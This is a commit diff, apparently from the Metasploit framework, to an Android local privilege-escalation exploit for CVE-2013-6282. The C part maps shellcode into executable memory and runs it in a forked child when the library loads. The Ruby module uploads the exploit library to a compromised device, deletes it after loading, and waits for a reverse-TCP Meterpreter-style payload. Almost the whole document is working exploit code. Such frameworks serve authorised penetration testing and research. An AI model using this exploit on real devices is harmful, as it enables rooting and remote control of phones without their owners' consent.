fork early and use WfsDelay

timwr · timwr · commit fe9972cc25f5 · 2016-12-13T17:02:23.000+08:00
diff --git a/external/source/exploits/CVE-2013-6282/exploit.c b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -679,18 +679,13 @@ void init_exploit() {
 	}
 	LOGV("running shellcode, uid=%d\n", uid);
 
-	int pid = fork();
-	LOGV("onload, pid=%d\n", pid);
-	if (pid == 0) {
-		void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
-		if (ptr == MAP_FAILED) {
-			return;
-		}
-		memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
-		void (*shellcode)() = (void(*)())ptr;
-		shellcode();
+	void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (ptr == MAP_FAILED) {
+		return;
 	}
-	LOGV("finished, pid=%d\n", pid);
+	memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
+	void (*shellcode)() = (void(*)())ptr;
+	shellcode();
 
 	LOGV("exiting.\n");
 }
@@ -712,7 +707,10 @@ JNIEXPORT jint JNICALL JNI_OnLoad( JavaVM *vm, void *pvt )
 		return -1;
 	}
 
-	init_exploit();
+	int pid = fork();
+	if (pid == 0) {
+		init_exploit();
+	}
 	return JNI_VERSION_1_4;
 }
 
diff --git a/modules/exploits/android/local/put_user_vroot.rb b/modules/exploits/android/local/put_user_vroot.rb
@@ -44,15 +44,12 @@ def initialize(info={})
         "Arch"           => ARCH_ARMLE,
         'DefaultOptions' =>
         {
+          'WfsDelay'     => 120,
           'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
         },
         'DefaultTarget' => 0,
       }
     ))
-    register_options(
-      [
-        OptInt.new("ListenerTimeout", [ true, "The maximum number of seconds to wait for a session", 300])
-      ], self.class)
   end
 
   def exploit
@@ -70,20 +67,16 @@ def exploit
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")
-    old_timeout = session.response_timeout
-    print_status("Be patient, this exploit will automatically timeout after #{datastore['ListenerTimeout']} seconds")
-    session.response_timeout = datastore['ListenerTimeout']
     session.core.load_library(
         'LibraryFilePath' => local_file,
         'TargetFilePath'  => remote_file,
         'UploadLibrary'   => false,
         'Extension'       => false,
         'SaveToDisk'      => false
     )
-    session.response_timeout = old_timeout
-    print_status("Loaded library #{remote_file}")
+    print_status("Loaded library #{remote_file}, deleting")
     session.fs.file.rm(remote_file)
-    print_status("Library #{remote_file} was deleted")
+    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
   end
 
 end
